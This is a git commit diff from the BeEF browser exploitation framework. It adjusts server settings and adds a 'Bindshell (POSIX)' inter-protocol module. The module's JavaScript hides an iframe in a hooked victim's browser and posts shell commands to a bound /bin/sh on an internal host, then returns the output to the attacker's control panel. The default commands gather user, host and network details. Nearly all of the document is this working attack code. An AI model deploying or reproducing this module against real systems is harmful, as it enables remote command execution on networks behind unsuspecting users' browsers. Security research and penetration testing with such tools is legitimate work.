Added IPEC Bindshell (POSIX) module

Fixes issue 476

Reverted revision 1314.



git-svn-id: https://beef.googlecode.com/svn/trunk@1315 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

config.yaml

@@ -27,11 +27,11 @@ beef:
         permitted_ui_subnet: "0.0.0.0/0"
     
     http:
-        host: "whatweb.net"
-        port: "31777"
+        host: "0.0.0.0"
+        port: "3000"
         # if running behind a nat set the public ip address here
         #public: ""
-        dns: "127.0.0.1"
+        dns: "localhost"
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
@@ -58,10 +58,6 @@ beef:
 
     # You may override default extension configuration parameters here
     extension:
-        admin_ui:
-            enable: true
-            username: "beef"
-            password: "beef"
         requester:
             enable: true 
         proxy:

modules/ipec/inter_protocol_posix_bindshell/command.js

@@ -0,0 +1,96 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var target_ip = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd = '<%= @cmd %>';
+	var command_timeout = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	// create iframe
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_posix_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	// send a request
+	function send_cmds(ip, port, cmd) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&";
+		var parent = window.location.href;
+
+		// create form
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+
+		// post results separator
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value","echo \"</pre><div id='ipc_content'>\" & " + cmd + " & echo Directory Contents: & ls -la & ");
+		myform.appendChild(myExt);
+
+		// post js to call home and close connection
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__</div><scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script>\" & exit & exit & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	// wait <timeout> seconds for iframe url fragment to match #ipc_result=
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_POSIX_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > command_timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=time out');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	// validate target
+	if (!target_port || !target_ip || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
+	} else if (target_port > 65535 || target_port < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+
+	// send request and wait for reply
+	} else {
+		send_cmds(target_ip, target_port, cmd);
+		waituntilok();
+	}
+
+});
+

modules/ipec/inter_protocol_posix_bindshell/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        inter_protocol_posix_bindshell:
+            enable: true
+            category: "IPEC"
+            name: "Bindshell (POSIX)"
+            description: "Using Inter-protocol Expliotation/Communication (IPEC) the hooked browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            authors: ["bcoles", "wade"]
+            target:
+                working: ["FF"]
+                not_working: ["C", "S", "O", "IE"]

modules/ipec/inter_protocol_posix_bindshell/module.rb

@@ -0,0 +1,77 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+=begin
+[+] Summary:
+
+Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
+
+The command results are returned to the BeEF control panel.
+
+[+] Tested:
+
+o Working:
+	o Mozilla Firefox 6
+
+o Not Working:
+	o Mozilla Firefox 6 with the NoScript extension
+	o Internet Explorer 8+
+	o Chrome 13
+	o Opera 11
+	o Safari 5
+
+[+] Notes:
+
+o The bindshell is closed once the module has completed. This is necessary otherwise the /bin/sh process will hang. To avoid this issue:
+
+	o remove the last "& exit" portion of the JavaScript payload. Be aware that this will leave redundant /bin/sh processes running on the target system.
+
+o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
+
+	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&/bin/sh&& <<< about:blank - 7}
+	SYSTEM rule:
+	Site LOCAL
+	Accept from LOCAL
+	Deny
+
+o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
+
+o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
+
+o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+
+=end
+
+class Inter_protocol_posix_bindshell < BeEF::Core::Command
+  
+  def self.options
+    return [
+	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
+	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
+	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
+	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo HostName: & hostname & ifconfig & netstat -an', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result'] if not @datastore['result'].nil?
+    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+    if content.empty?
+      content['fail'] = 'No data was returned.'
+    end
+    save content
+  end
+end